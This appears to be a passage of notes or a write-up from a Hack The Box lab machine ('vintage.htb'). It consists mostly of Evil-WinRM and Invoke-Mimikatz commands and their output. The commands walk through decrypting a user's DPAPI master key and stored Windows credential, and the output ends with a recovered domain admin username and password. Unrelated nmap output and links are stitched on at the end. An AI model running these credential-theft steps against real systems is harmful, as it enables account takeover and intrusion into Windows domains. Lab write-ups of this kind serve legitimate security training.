guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {99cf41a3-a552-4cf7-a8d7-aca2d6f7339b}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -force
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6
ls -force C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
*Evil-WinRM* PS C:\Users\C.Neri\Documents> ls -force C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/7/2024 1:17 PM S-1-5-21-4024337825-2033394866-2055507597-1115
-a-hs- 6/7/2024 1:17 PM 24 CREDHIST
-a-hs- 6/7/2024 1:17 PM 76 SYNCHIST
*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> ls -force
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 1:17 PM 740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs- 6/7/2024 1:17 PM 740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b - THAT'S THE ONE
-a-hs- 6/7/2024 1:17 PM 904 BK-VINTAGE
-a-hs- 6/7/2024 1:17 PM 24 Preferred
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" "/rpc" "exit"'
[SNIP]
Auto SID from path seems to be: S-1-5-21-4024337825-2033394866-2055507597-1115
[backupkey] without DPAPI_SYSTEM:
key : 90b520819fcae440ed4157dfcc0a2d17ab3e97e68cac0822cf255dd726260f23
sha1: 27c74b34937960c125f660bd8cce99dc6f084e7e
[domainkey] with RPC
[DC] 'vintage.htb' will be the domain
[DC] 'dc01.vintage.htb' will be the DC server
key : f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
sha1: 665c9a57083d5dfae8627916fe4ad144006c59dc
[SNIP]
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" "/sid:S-1-5-21-4024337825-2033394866-2055507597-1115" "/password:Zer0the0ne" "/protected" "exit"'
[SNIP]
[masterkey] with password: Zer0the0ne (protected user)
key : f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
sha1: 665c9a57083d5dfae8627916fe4ad144006c59dc
[backupkey] without DPAPI_SYSTEM:
key : 90b520819fcae440ed4157dfcc0a2d17ab3e97e68cac0822cf255dd726260f23
sha1: 27c74b34937960c125f660bd8cce99dc6f084e7e
[SNIP]
Master Key: f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a" "exit"'
[SNIP]
TargetName : LegacyGeneric:target=admin_acc
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : vintage\c.neri_adm
CredentialBlob : Uncr4ck4bl3P4ssW0rd0312
Attributes : 0
vintage\c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49687/tcp open unknown
49695/tcp open unknown
57868/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-03T15:16:05
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
https://notes.incendium.rocks/pentesting-notes/windows-pentesting/tools/bloodyad
https://gist.github.com/mpgn/9fc08b0f0fde55e8c322518bc1f9c317